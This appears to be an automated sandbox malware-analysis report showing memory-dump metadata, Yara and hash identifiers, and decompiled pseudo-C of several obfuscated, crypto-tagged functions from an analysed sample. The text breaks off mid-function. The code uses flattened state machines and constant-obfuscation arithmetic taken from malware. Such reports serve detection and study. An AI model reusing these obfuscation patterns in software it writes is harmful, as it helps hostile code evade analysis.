                                                      0x0023b83d
                                                      0x0023b84d
                                                      0x0023b851
                                                      0x0023b859
                                                      0x0023b865
                                                      0x0023b86a
                                                      0x0023b870
                                                      0x0023b875
                                                      0x0023b87d
                                                      0x0023b885
                                                      0x0023b891
                                                      0x0023b896
                                                      0x0023b89c
                                                      0x0023b8a4
                                                      0x0023b8b1
                                                      0x0023b8b2
                                                      0x0023b8b6
                                                      0x0023b8be
                                                      0x0023b8c6
                                                      0x0023b8ce
                                                      0x0023b8dc
                                                      0x0023b8e0
                                                      0x0023b8e5
                                                      0x0023b8ed
                                                      0x0023b903
                                                      0x0023b906
                                                      0x0023b90a
                                                      0x0023b90e
                                                      0x0023b916
                                                      0x0023b926
                                                      0x0023b92a
                                                      0x0023b92f
                                                      0x0023b937
                                                      0x0023b93f
                                                      0x0023b94b
                                                      0x0023b950
                                                      0x0023b956
                                                      0x0023b95e
                                                      0x0023b966
                                                      0x0023b96b
                                                      0x0023b970
                                                      0x0023b978
                                                      0x0023b980
                                                      0x0023b989
                                                      0x0023b98c
                                                      0x0023b990
                                                      0x0023b998
                                                      0x0023b9a0
                                                      0x0023b9a8
                                                      0x0023b9ad
                                                      0x0023b9b2
                                                      0x0023b9ba
                                                      0x0023b9c2
                                                      0x0023b9ca
                                                      0x0023b9d2
                                                      0x0023b9da
                                                      0x0023b9e2
                                                      0x0023b9ea
                                                      0x0023b9f2
                                                      0x0023b9f7
                                                      0x0023b9ff
                                                      0x0023ba07
                                                      0x0023ba07
                                                      0x0023ba09
                                                      0x0023ba0a
                                                      0x0023ba0f
                                                      0x0023ba0f
                                                      0x0023ba19
                                                      0x0023bae9
                                                      0x0023baf0
                                                      0x0023baf3
                                                      0x0023baf5
                                                      0x0023bafd
                                                      0x00000000
                                                      0x0023ba1f
                                                      0x0023ba25
                                                      0x0023ba67
                                                      0x0023ba74
                                                      0x0023ba79
                                                      0x0023baaf
                                                      0x0023bac8
                                                      0x0023bacb
                                                      0x0023bad0
                                                      0x0023bad5
                                                      0x0023bb24
                                                      0x0023bb24
                                                      0x00000000
                                                      0x0023ba27
                                                      0x0023ba2d
                                                      0x0023ba63
                                                      0x00000000
                                                      0x0023ba2f
                                                      0x0023ba35
                                                      0x00000000
                                                      0x0023ba3b
                                                      0x0023ba4f
                                                      0x0023ba54
                                                      0x0023ba35
                                                      0x0023ba2d
                                                      0x0023ba25
                                                      0x0023ba57
                                                      0x0023ba62
                                                      0x0023ba62
                                                      0x0023bb06
                                                      0x0023bb0c
                                                      0x0023bb17
                                                      0x0023bb17
                                                      0x0023bb1a
                                                      0x00000000
                                                      0x00000000
                                                      0x0023bb14
                                                      0x0023bb14
                                                      0x0023bb14
                                                      0x0023bb1c
                                                      0x0023bb1c
                                                      0x0023bb1f
                                                      0x00000000
                                                      0x0023bb29
                                                      0x0023bb29
                                                      0x0023bb29
                                                      0x00000000
                                                      0x0023bb35

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp Download File
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (%$AP$Cw$O1d#$O1d#$R\$xq$,^
                                                      • API String ID: 0-1090126677
                                                      • Opcode ID: fc0b7eac682070b86e863ada7dc9972440f97ea631edd66f9fc98ebeca198662
                                                      • Instruction ID: 65ab8ff57d547d57f0defd82d6deff18c2fc809d54de5397f532130be0a90471
                                                      • Opcode Fuzzy Hash: fc0b7eac682070b86e863ada7dc9972440f97ea631edd66f9fc98ebeca198662
                                                      • Instruction Fuzzy Hash: 7AA133B15093409BD359CF64C98A81BFBE2BBC4B58F10491DF285862A0D7B9C959CF43
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0023EA4C, Relevance: 10.2, Strings: 8, Instructions: 203COMMONCrypto
                                                      Download Yara Rule
                                                      C-Code - Quality: 92%
                                                      			E0023EA4C(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr _a16) {
				signed int _v4;
				intOrPtr _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				void* __ecx;
				void* _t188;
				void* _t219;
				intOrPtr* _t220;
				void* _t222;
				void* _t241;
				void* _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t246;
				signed int _t247;
				signed int _t248;
				signed int _t249;
				signed int* _t252;

				_t220 = _a12;
				_push(_a16);
				_t241 = __edx;
				_push(_t220);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E0023602B(_t188);
				_v8 = 0x50f8de;
				_t242 = 0;
				_v4 = _v4 & 0;
				_t252 =  &(( &_v80)[6]);
				_v76 = 0x4711;
				_v76 = _v76 + 0x6e0d;
				_t222 = 0x302d2de5;
				_v76 = _v76 << 0x10;
				_v76 = _v76 | 0x353296c6;
				_v76 = _v76 ^ 0xb53e96c7;
				_v52 = 0x1390;
				_v52 = _v52 << 4;
				_v52 = _v52 | 0x6ec3950a;
				_t243 = 0x1f;
				_v52 = _v52 * 0x25;
				_v52 = _v52 ^ 0x024a5273;
				_v64 = 0xc0d5;
				_v64 = _v64 >> 3;
				_v64 = _v64 ^ 0x4ce1daf8;
				_v64 = _v64 + 0xffff0c87;
				_v64 = _v64 ^ 0x4ce0d906;
				_v24 = 0xb115;
				_v24 = _v24 / _t243;
				_v24 = _v24 ^ 0x000025ae;
				_v68 = 0xbf02;
				_v68 = _v68 >> 1;
				_v68 = _v68 >> 7;
				_v68 = _v68 | 0xaaaffe07;
				_v68 = _v68 ^ 0xaaaf82c8;
				_v72 = 0x967c;
				_v72 = _v72 ^ 0xbb45b93e;
				_t244 = 0x5e;
				_v72 = _v72 * 0x31;
				_v72 = _v72 | 0x543854ee;
				_v72 = _v72 ^ 0xdc3e0629;
				_v28 = 0xb197;
				_v28 = _v28 / _t244;
				_v28 = _v28 ^ 0x00005929;
				_v80 = 0xf6df;
				_v80 = _v80 * 0x2c;
				_v80 = _v80 + 0xffff5b03;
				_v80 = _v80 ^ 0xcc4f4477;
				_v80 = _v80 ^ 0xcc66b212;
				_v60 = 0x7f94;
				_v60 = _v60 * 0x70;
				_v60 = _v60 + 0xffff5d6f;
				_v60 = _v60 + 0xffffe912;
				_v60 = _v60 ^ 0x0037713c;
				_v40 = 0x7639;
				_v40 = _v40 ^ 0xf24db204;
				_v40 = _v40 * 0xf;
				_v40 = _v40 ^ 0x328e289a;
				_v20 = 0xd74f;
				_v20 = _v20 | 0xd22ad029;
				_v20 = _v20 ^ 0xd22a9d24;
				_v16 = 0xecd5;
				_v16 = _v16 << 7;
				_v16 = _v16 ^ 0x0076152b;
				_v44 = 0x5bc3;
				_v44 = _v44 + 0x5ef7;
				_v44 = _v44 | 0x81401b0a;
				_v44 = _v44 >> 0xf;
				_v44 = _v44 ^ 0x00015921;
				_v32 = 0x3f29;
				_t245 = 0x22;
				_v32 = _v32 / _t245;
				_v32 = _v32 >> 0xd;
				_v32 = _v32 ^ 0x00005264;
				_v48 = 0x731;
				_v48 = _v48 | 0x306aed8f;
				_v48 = _v48 + 0xffff48d8;
				_t246 = 0x76;
				_v48 = _v48 / _t246;
				_v48 = _v48 ^ 0x0069195c;
				_v36 = 0x33bb;
				_t247 = 0x45;
				_v36 = _v36 / _t247;
				_v36 = _v36 + 0xffffe7cb;
				_v36 = _v36 ^ 0xfffff379;
				_v56 = 0xdfcb;
				_t248 = 0x48;
				_v56 = _v56 / _t248;
				_t249 = 0x3a;
				_v56 = _v56 / _t249;
				_v56 = _v56 * 0x52;
				_v56 = _v56 ^ 0x00005386;
				do {
					while(_t222 != 0x246653ae) {
						if(_t222 == 0x260f4fd2) {
							_push(_t222);
							_push(_t222);
							_t242 = E00238736(_v12);
							if(_t242 != 0) {
								_t222 = 0x246653ae;
								continue;
							}
						} else {
							if(_t222 == 0x2ff0f75c) {
								_t219 = E002459A5(_v64, 0, _t241,  &_v12, _v24, _v68, _v72, _v28, _t222, _v76, _v80);
								_t252 =  &(_t252[0xb]);
								if(_t219 != 0) {
									_t222 = 0x260f4fd2;
									continue;
								}
							} else {
								if(_t222 != 0x302d2de5) {
									goto L11;
								} else {
									_t222 = 0x2ff0f75c;
									continue;
								}
							}
						}
						goto L12;
					}
					E002459A5(_v16, _t242, _t241,  &_v12, _v44, _v32, _v48, _v36, _t222, _v52, _v56);
					_t252 =  &(_t252[0xb]);
					 *_t220 = _v12;
					_t222 = 0x6a13bb9;
					L11:
				} while (_t222 != 0x6a13bb9);
				L12:
				return _t242;
			}






































                                                      0x0023ea50
                                                      0x0023ea57
                                                      0x0023ea5b
                                                      0x0023ea5d
                                                      0x0023ea5e
                                                      0x0023ea62
                                                      0x0023ea66
                                                      0x0023ea68
                                                      0x0023ea6d
                                                      0x0023ea75
                                                      0x0023ea77
                                                      0x0023ea7b
                                                      0x0023ea7e
                                                      0x0023ea88
                                                      0x0023ea90
                                                      0x0023ea95
                                                      0x0023ea9a
                                                      0x0023eaa2
                                                      0x0023eaaa
                                                      0x0023eab2
                                                      0x0023eab7
                                                      0x0023eac6
                                                      0x0023eac9
                                                      0x0023eacd
                                                      0x0023ead5
                                                      0x0023eadd
                                                      0x0023eae2
                                                      0x0023eaea
                                                      0x0023eaf2
                                                      0x0023eafa
                                                      0x0023eb0a
                                                      0x0023eb0e
                                                      0x0023eb16
                                                      0x0023eb1e
                                                      0x0023eb22
                                                      0x0023eb27
                                                      0x0023eb2f
                                                      0x0023eb37
                                                      0x0023eb3f
                                                      0x0023eb4c
                                                      0x0023eb4d
                                                      0x0023eb51
                                                      0x0023eb59
                                                      0x0023eb61
                                                      0x0023eb6f
                                                      0x0023eb73
                                                      0x0023eb7b
                                                      0x0023eb88
                                                      0x0023eb8c
                                                      0x0023eb94
                                                      0x0023eb9c
                                                      0x0023eba4
                                                      0x0023ebb1
                                                      0x0023ebb5
                                                      0x0023ebbd
                                                      0x0023ebc5
                                                      0x0023ebcd
                                                      0x0023ebd5
                                                      0x0023ebe2
                                                      0x0023ebe6
                                                      0x0023ebee
                                                      0x0023ebf6
                                                      0x0023ebfe
                                                      0x0023ec06
                                                      0x0023ec10
                                                      0x0023ec15
                                                      0x0023ec1d
                                                      0x0023ec25
                                                      0x0023ec2d
                                                      0x0023ec35
                                                      0x0023ec3a
                                                      0x0023ec42
                                                      0x0023ec50
                                                      0x0023ec55
                                                      0x0023ec5b
                                                      0x0023ec60
                                                      0x0023ec68
                                                      0x0023ec70
                                                      0x0023ec78
                                                      0x0023ec84
                                                      0x0023ec89
                                                      0x0023ec8f
                                                      0x0023ec97
                                                      0x0023eca3
                                                      0x0023eca8
                                                      0x0023ecae
                                                      0x0023ecb6
                                                      0x0023ecbe
                                                      0x0023ecca
                                                      0x0023eccf
                                                      0x0023ecd9
                                                      0x0023ece1
                                                      0x0023ecea
                                                      0x0023ecee
                                                      0x0023ecf6
                                                      0x0023ecf6
                                                      0x0023ed04
                                                      0x0023ed65
                                                      0x0023ed66
                                                      0x0023ed70
                                                      0x0023ed76
                                                      0x0023ed78
                                                      0x00000000
                                                      0x0023ed78
                                                      0x0023ed06
                                                      0x0023ed0c
                                                      0x0023ed46
                                                      0x0023ed4b
                                                      0x0023ed50
                                                      0x0023ed52
                                                      0x00000000
                                                      0x0023ed52
                                                      0x0023ed0e
                                                      0x0023ed14
                                                      0x00000000
                                                      0x0023ed1a
                                                      0x0023ed1a
                                                      0x00000000
                                                      0x0023ed1a
                                                      0x0023ed14
                                                      0x0023ed0c
                                                      0x00000000
                                                      0x0023ed04
                                                      0x0023eda3
                                                      0x0023edaf
                                                      0x0023edb2
                                                      0x0023edb4
                                                      0x0023edb9
                                                      0x0023edb9
                                                      0x0023edc6
                                                      0x0023edce

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp Download File
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: n$)?$9v$<q7$dR$--0$--0$T8T
                                                      • API String ID: 0-1820671589
                                                      • Opcode ID: be8d65528413908eb97d300261921cde85efd59b20c5887c49dbf67893863774
                                                      • Instruction ID: b26461ee6086b019258c9ea88240351247bf71f64ba67c129e3c2fade1d54453
                                                      • Opcode Fuzzy Hash: be8d65528413908eb97d300261921cde85efd59b20c5887c49dbf67893863774
                                                      • Instruction Fuzzy Hash: 2E9152710083419BD768CF61C98981FFBF1FBC5B58F405A1DF2968A2A0C3B68A198F47
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0024A0AF, Relevance: 9.0, Strings: 7, Instructions: 283COMMONCrypto
                                                      Download Yara Rule
                                                      C-Code - Quality: 96%
                                                      			E0024A0AF(void* __ecx, void* __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				void* _t237;
				void* _t251;
				void* _t256;
				short _t257;
				void* _t258;
				void* _t262;
				signed int _t268;
				signed int _t269;
				void* _t271;
				signed int _t309;
				signed int _t310;
				signed int _t311;
				signed int _t312;
				signed int _t313;
				signed int _t314;
				signed int _t315;
				signed int _t316;
				signed int _t317;
				intOrPtr _t319;
				signed int _t320;
				signed int _t323;
				signed int* _t325;
				void* _t327;

				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0023602B(_t237);
				_v8 = _v8 & 0x00000000;
				_t325 =  &(( &_v108)[4]);
				_v36 = 0x3ea4;
				_v36 = _v36 >> 7;
				_t271 = 0x1d995f52;
				_v36 = _v36 ^ 0x0000fd94;
				_v100 = 0xb5d8;
				_t313 = 0x12;
				_v100 = _v100 / _t313;
				_v100 = _v100 + 0xffffd667;
				_v100 = _v100 << 9;
				_v100 = _v100 ^ 0xffc12715;
				_v44 = 0xa7b5;
				_v44 = _v44 + 0x5ef4;
				_v44 = _v44 ^ 0x00014b95;
				_v48 = 0x9389;
				_v48 = _v48 + 0xb0ba;
				_v48 = _v48 ^ 0x000118ce;
				_v88 = 0x5fea;
				_t314 = 0x1c;
				_v88 = _v88 * 0x7c;
				_v88 = _v88 ^ 0x636ec63e;
				_v88 = _v88 ^ 0x63409d32;
				_v16 = 0x76ea;
				_v16 = _v16 << 5;
				_v16 = _v16 ^ 0x000ec3ec;
				_v20 = 0x91aa;
				_v20 = _v20 | 0x0edf39e6;
				_v20 = _v20 ^ 0x0edfdf8b;
				_v52 = 0xaa70;
				_v52 = _v52 + 0x8ed4;
				_v52 = _v52 ^ 0x00017b8d;
				_v104 = 0xa114;
				_v104 = _v104 >> 5;
				_v104 = _v104 << 0xc;
				_v104 = _v104 / _t314;
				_v104 = _v104 ^ 0x0002b555;
				_v108 = 0xd093;
				_v108 = _v108 << 0xa;
				_t315 = 0x69;
				_v108 = _v108 * 0x4a;
				_v108 = _v108 / _t315;
				_v108 = _v108 ^ 0x024bf4a9;
				_v80 = 0x5298;
				_v80 = _v80 | 0xf2bddfef;
				_v80 = _v80 ^ 0xf2bdee35;
				_v84 = 0xad61;
				_v84 = _v84 << 6;
				_v84 = _v84 ^ 0x5376a172;
				_v84 = _v84 ^ 0x535d9bb3;
				_v96 = 0xfad4;
				_v96 = _v96 + 0xc0fb;
				_t316 = 0x75;
				_v96 = _v96 / _t316;
				_t317 = 0x41;
				_t323 = _a8;
				_v96 = _v96 / _t317;
				_v96 = _v96 ^ 0x00007e63;
				_v40 = 0x6cc;
				_v40 = _v40 + 0x5321;
				_v40 = _v40 ^ 0x00002fe7;
				_v76 = 0xe38c;
				_v76 = _v76 + 0x66b4;
				_v76 = _v76 >> 5;
				_v76 = _v76 ^ 0x00001a53;
				_v68 = 0xaffd;
				_v68 = _v68 + 0x9b0e;
				_v68 = _v68 ^ 0x74692a2f;
				_v68 = _v68 ^ 0x74685d67;
				_v92 = 0xd493;
				_v92 = _v92 >> 5;
				_v92 = _v92 + 0xffffb819;
				_v92 = _v92 << 3;
				_v92 = _v92 ^ 0xfffdea97;
				_v32 = 0x61b7;
				_v32 = _v32 >> 0xa;
				_v32 = _v32 ^ 0x00001b97;
				_v72 = 0x8555;
				_v72 = _v72 >> 6;
				_v72 = _v72 >> 7;
				_v72 = _v72 ^ 0x00005e98;
				_v64 = 0xfd5d;
				_v64 = _v64 ^ 0xfb760f92;
				_v64 = _v64 + 0xe44c;
				_v64 = _v64 ^ 0xfb77c0e2;
				_v24 = 0xfd78;
				_v24 = _v24 ^ 0x534e19f9;
				_v24 = _v24 ^ 0x534eb204;
				_v28 = 0xae38;
				_v28 = _v28 ^ 0x0fcca386;
				_v28 = _v28 ^ 0x0fcc33c1;
				_t268 = _a8;
				_v56 = 0x9a6f;
				_v56 = _v56 | 0xcfdc8d68;
				_v56 = _v56 ^ 0xf237fb5d;
				_v56 = _v56 ^ 0x3deb56e2;
				_v12 = 0xde50;
				_v12 = _v12 << 0xc;
				_v12 = _v12 ^ 0x0de56132;
				_v60 = 0x8399;
				_v60 = _v60 ^ 0x95508e48;
				_v60 = _v60 ^ 0xc724022f;
				_v60 = _v60 ^ 0x52742192;
				while(1) {
					L1:
					_t251 = 0x10ef006b;
					do {
						while(1) {
							L2:
							_t327 = _t271 - 0x1d995f52;
							if(_t327 > 0) {
								break;
							}
							if(_t327 == 0) {
								_t271 = 0x1679d154;
								continue;
							} else {
								if(_t271 == 0x829cfc0) {
									_t311 = _v8;
									if(_t311 != 0) {
										do {
											_t320 =  *((intOrPtr*)(_t311 + 0x220));
											E0023F536(_v56, _v12, _v60, _t311);
											_t311 = _t320;
										} while (_t320 != 0);
									}
								} else {
									if(_t271 == _t251) {
										_t312 = _v8;
										_t268 = 0;
										if(_t312 != 0) {
											do {
												E00236636(_t268 * 2 + _t323, _v80, _v84, _v96, _t312 + 0xc);
												_t256 = E00240ADC(_t312 + 0xc, _v40, _v76);
												_t325 =  &(_t325[4]);
												_t269 = _t268 + _t256;
												_t257 = 0x2c;
												 *((short*)(_t323 + _t269 * 2)) = _t257;
												_t268 = _t269 + 1;
												_t312 =  *((intOrPtr*)(_t312 + 0x220));
											} while (_t312 != 0);
											_t251 = 0x10ef006b;
										}
										_t319 = _v4;
										_t271 = 0x33a3af6e;
										_t310 = _a8;
										continue;
									} else {
										if(_t271 == 0x1679d154) {
											E00245A61( &_v8, E00248D1C, _v44, _v48, _v88);
											_t325 =  &(_t325[4]);
											_t271 = 0x20b4c829;
											while(1) {
												L1:
												_t251 = 0x10ef006b;
												goto L2;
											}
										} else {
											if(_t271 != 0x19514a0a) {
												goto L24;
											} else {
												_push(_t271);
												_push(_t271);
												_t323 = E00238736(_t319 + _t319);
												_t251 = 0x10ef006b;
												_t271 =  !=  ? 0x10ef006b : 0x829cfc0;
												continue;
											}
										}
									}
								}
							}
							L28:
							return 0 |  *_a8 != 0x00000000;
						}
						if(_t271 == 0x20b4c829) {
							_t309 = _v8;
							_t319 = 0;
							_v4 = 0;
							if(_t309 != 0) {
								do {
									_t258 = E00240ADC(_t309 + 0xc, _v16, _v20);
									_t309 =  *(_t309 + 0x220);
									_t319 = _t319 + 1 + _t258;
								} while (_t309 != 0);
								_v4 = _t319;
								_t251 = 0x10ef006b;
							}
							_t310 = _a8;
							_t271 = 0x19514a0a;
							goto L24;
						} else {
							if(_t271 == 0x2b3a1c97) {
								E0023F536(_v64, _v24, _v28, _t323);
								_t271 = 0x829cfc0;
								goto L1;
							} else {
								if(_t271 != 0x33a3af6e) {
									goto L24;
								} else {
									_t260 = _t310 + 4;
									 *(_t310 + 4) =  *(_t310 + 4) & 0x00000000;
									_t262 = E00245D1D(_v68, _v92, _v32, _v72, _t268 - 1, _t323, _v36, _t260);
									_t325 =  &(_t325[6]);
									 *_t310 = _t262;
									_t271 = 0x2b3a1c97;
									while(1) {
										L1:
										_t251 = 0x10ef006b;
										goto L2;
									}
								}
							}
						}
						goto L28;
						L24:
					} while (_t271 != 0x202e1177);
					goto L28;
				}
			}





















































                                                      0x0024a0bd
                                                      0x0024a0be
                                                      0x0024a0c5
                                                      0x0024a0c6
                                                      0x0024a0c7
                                                      0x0024a0cc
                                                      0x0024a0d4
                                                      0x0024a0d7
                                                      0x0024a0e1
                                                      0x0024a0e6
                                                      0x0024a0eb
                                                      0x0024a0f3
                                                      0x0024a101
                                                      0x0024a106
                                                      0x0024a10c
                                                      0x0024a114
                                                      0x0024a119
                                                      0x0024a121
                                                      0x0024a129
                                                      0x0024a131
                                                      0x0024a139
                                                      0x0024a141
                                                      0x0024a149
                                                      0x0024a151
                                                      0x0024a15e
                                                      0x0024a161
                                                      0x0024a165
                                                      0x0024a16d
                                                      0x0024a175
                                                      0x0024a17d
                                                      0x0024a182
                                                      0x0024a18a
                                                      0x0024a192
                                                      0x0024a19a
                                                      0x0024a1a2
                                                      0x0024a1aa
                                                      0x0024a1b2
                                                      0x0024a1ba
                                                      0x0024a1c2
                                                      0x0024a1c7
                                                      0x0024a1d4
                                                      0x0024a1d8
                                                      0x0024a1e0
                                                      0x0024a1e8
                                                      0x0024a1f2
                                                      0x0024a1f5
                                                      0x0024a201
                                                      0x0024a205
                                                      0x0024a20d
                                                      0x0024a215
                                                      0x0024a21d
                                                      0x0024a225
                                                      0x0024a22d
                                                      0x0024a232
                                                      0x0024a23a
                                                      0x0024a242
                                                      0x0024a24a
                                                      0x0024a256
                                                      0x0024a259
                                                      0x0024a265
                                                      0x0024a268
                                                      0x0024a26f
                                                      0x0024a273
                                                      0x0024a27b
                                                      0x0024a283
                                                      0x0024a28b
                                                      0x0024a293
                                                      0x0024a29b
                                                      0x0024a2a3
                                                      0x0024a2a8
                                                      0x0024a2b0
                                                      0x0024a2b8
                                                      0x0024a2c0
                                                      0x0024a2c8
                                                      0x0024a2d0
                                                      0x0024a2d8
                                                      0x0024a2dd
                                                      0x0024a2e5
                                                      0x0024a2ea
                                                      0x0024a2f2
                                                      0x0024a2fa
                                                      0x0024a2ff
                                                      0x0024a307
                                                      0x0024a30f
                                                      0x0024a314
                                                      0x0024a319
                                                      0x0024a321
                                                      0x0024a329
                                                      0x0024a331
                                                      0x0024a339
                                                      0x0024a341
                                                      0x0024a349
                                                      0x0024a351
                                                      0x0024a359
                                                      0x0024a361
                                                      0x0024a369
                                                      0x0024a371
                                                      0x0024a37c
                                                      0x0024a384
                                                      0x0024a38c
                                                      0x0024a394
                                                      0x0024a39c
                                                      0x0024a3a4
                                                      0x0024a3a9
                                                      0x0024a3b1
                                                      0x0024a3b9
                                                      0x0024a3c1
                                                      0x0024a3c9
                                                      0x0024a3d1
                                                      0x0024a3d1
                                                      0x0024a3d1
                                                      0x0024a3d6
                                                      0x0024a3d6
                                                      0x0024a3d6
                                                      0x0024a3d6
                                                      0x0024a3dc
                                                      0x00000000
                                                      0x00000000
                                                      0x0024a3e2
                                                      0x0024a4cb
                                                      0x00000000
                                                      0x0024a3e8
                                                      0x0024a3ee
                                                      0x0024a592
                                                      0x0024a598
                                                      0x0024a59a
                                                      0x0024a59a
                                                      0x0024a5ad
                                                      0x0024a5b2
                                                      0x0024a5b6
                                                      0x0024a59a
                                                      0x0024a3f4
                                                      0x0024a3f6
                                                      0x0024a462
                                                      0x0024a466
                                                      0x0024a46a
                                                      0x0024a46c
                                                      0x0024a485
                                                      0x0024a494
                                                      0x0024a499
                                                      0x0024a49c
                                                      0x0024a4a0
                                                      0x0024a4a1
                                                      0x0024a4a6
                                                      0x0024a4a7
                                                      0x0024a4ad
                                                      0x0024a4b1
                                                      0x0024a4b1
                                                      0x0024a4b6
                                                      0x0024a4ba
                                                      0x0024a4bf
                                                      0x00000000
                                                      0x0024a3f8
                                                      0x0024a3fe
                                                      0x0024a450
                                                      0x0024a455
                                                      0x0024a458
                                                      0x0024a3d1
                                                      0x0024a3d1
                                                      0x0024a3d1
                                                      0x00000000
                                                      0x0024a3d1
                                                      0x0024a400
                                                      0x0024a406
                                                      0x00000000
                                                      0x0024a40c
                                                      0x0024a418
                                                      0x0024a419
                                                      0x0024a423
                                                      0x0024a425
                                                      0x0024a432
                                                      0x00000000
                                                      0x0024a432
                                                      0x0024a406
                                                      0x0024a3fe
                                                      0x0024a3f6
                                                      0x0024a3ee
                                                      0x0024a5ba
                                                      0x0024a5cf
                                                      0x0024a5cf
                                                      0x0024a4db
                                                      0x0024a543
                                                      0x0024a547
                                                      0x0024a549
                                                      0x0024a54f
                                                      0x0024a551
                                                      0x0024a55c
                                                      0x0024a561
                                                      0x0024a568
                                                      0x0024a56b
                                                      0x0024a56f
                                                      0x0024a573
                                                      0x0024a573
                                                      0x0024a578
                                                      0x0024a57f
                                                      0x00000000
                                                      0x0024a4dd
                                                      0x0024a4e3
                                                      0x0024a532
                                                      0x0024a539
                                                      0x00000000
                                                      0x0024a4e5
                                                      0x0024a4eb
                                                      0x00000000
                                                      0x0024a4f1
                                                      0x0024a4f1
                                                      0x0024a4f4
                                                      0x0024a511
                                                      0x0024a516
                                                      0x0024a519
                                                      0x0024a51b
                                                      0x0024a3d1
                                                      0x0024a3d1
                                                      0x0024a3d1
                                                      0x00000000
                                                      0x0024a3d1
                                                      0x0024a3d1
                                                      0x0024a4eb
                                                      0x0024a4e3
                                                      0x00000000
                                                      0x0024a584
                                                      0x0024a584
                                                      0x00000000
                                                      0x0024a590

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp Download File
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 2a$L$c~$g]ht$/$V=$_
                                                      • API String ID: 0-445983283
                                                      • Opcode ID: 078e6ad265461bebca42c164fcce9eabec9b304a3c18c9b4c04194696e6c820d
                                                      • Instruction ID: 05664ee7300c47d88b8e96b90979ea82c034e7e09d735e01ec121f816f5dbe68
                                                      • Opcode Fuzzy Hash: 078e6ad265461bebca42c164fcce9eabec9b304a3c18c9b4c04194696e6c820d
                                                      • Instruction Fuzzy Hash: 7CD161725187828FD368CF65C48991FBBE2BFC4758F60890CF596862A0D7B49919CF83
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00247F1F, Relevance: 9.0, Strings: 7, Instructions: 237COMMONCrypto
                                                      Download Yara Rule
                                                      C-Code - Quality: 96%
                                                      			E00247F1F(void* __ecx) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				void* _t229;
				void* _t232;
				void* _t233;
				void* _t236;
				void* _t238;
				void* _t241;
				void* _t246;
				void* _t247;
				signed int _t249;
				signed int _t250;
				signed int _t251;
				signed int _t252;
				signed int _t253;
				intOrPtr _t271;
				void* _t272;
				signed int* _t274;
				void* _t277;

				_t274 =  &_v104;
				_v16 = 0x432510;
				_v12 = 0x57033b;
				_v8 = 0x70a374;
				_t271 = 0;
				_t247 = __ecx;
				_v4 = 0;
				_t272 = 0x285a15;
				_v52 = 0x28a8;
				_v52 = _v52 << 0xb;
				_t249 = 0x64;
				_v52 = _v52 / _t249;
				_v52 = _v52 ^ 0x00032641;
				_v56 = 0x58c1;
				_v56 = _v56 ^ 0x08ae2152;
				_v56 = _v56 ^ 0xe42bbac7;
				_v56 = _v56 ^ 0xec85f018;
				_v60 = 0x32b9;
				_v60 = _v60 >> 7;
				_v60 = _v60 ^ 0x4ab7c61f;
				_v60 = _v60 ^ 0x4ab7bf69;
				_v88 = 0xcc29;
				_v88 = _v88 << 7;
				_v88 = _v88 >> 0xe;
				_t250 = 0x27;
				_v88 = _v88 * 0x71;
				_v88 = _v88 ^ 0x00008073;
				_v28 = 0x82bf;
				_v28 = _v28 / _t250;
				_v28 = _v28 ^ 0x0000421a;
				_v80 = 0xde89;
				_v80 = _v80 | 0x25f7ab60;
				_v80 = _v80 + 0xffffb767;
				_v80 = _v80 ^ 0x25f7d2d5;
				_v84 = 0xb172;
				_v84 = _v84 | 0x58f01ffb;
				_v84 = _v84 ^ 0x6aa9a845;
				_v84 = _v84 | 0x8208c103;
				_v84 = _v84 ^ 0xb259d8d2;
				_v48 = 0xe27e;
				_v48 = _v48 | 0xfee9bf5f;
				_v48 = _v48 ^ 0xfee98d98;
				_v64 = 0x40d4;
